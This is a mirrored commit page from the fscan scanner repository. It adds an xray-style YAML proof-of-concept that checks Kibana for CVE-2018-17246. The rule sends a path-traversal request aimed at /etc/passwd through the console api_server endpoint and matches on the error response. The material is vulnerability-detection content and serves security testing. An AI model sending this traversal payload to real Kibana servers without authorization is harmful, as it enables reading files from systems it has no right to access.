mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,13 @@
|
||||
name: poc-yaml-kibana-cve-2018-17246
|
||||
rules:
|
||||
- method: GET
|
||||
path: /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.headers["kbn-name"] == "kibana" && response.content_type.contains("application/json") && response.body.bcontains(bytes("\"statusCode\":500")) && response.body.bcontains(bytes("\"message\":\"An internal server error occurred\""))
|
||||
detail:
|
||||
author: canc3s(https://github.com/canc3s)
|
||||
kibana_version: before 6.4.3 and 5.6.13
|
||||
links:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
|
||||
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
|
||||
Reference in New Issue
Block a user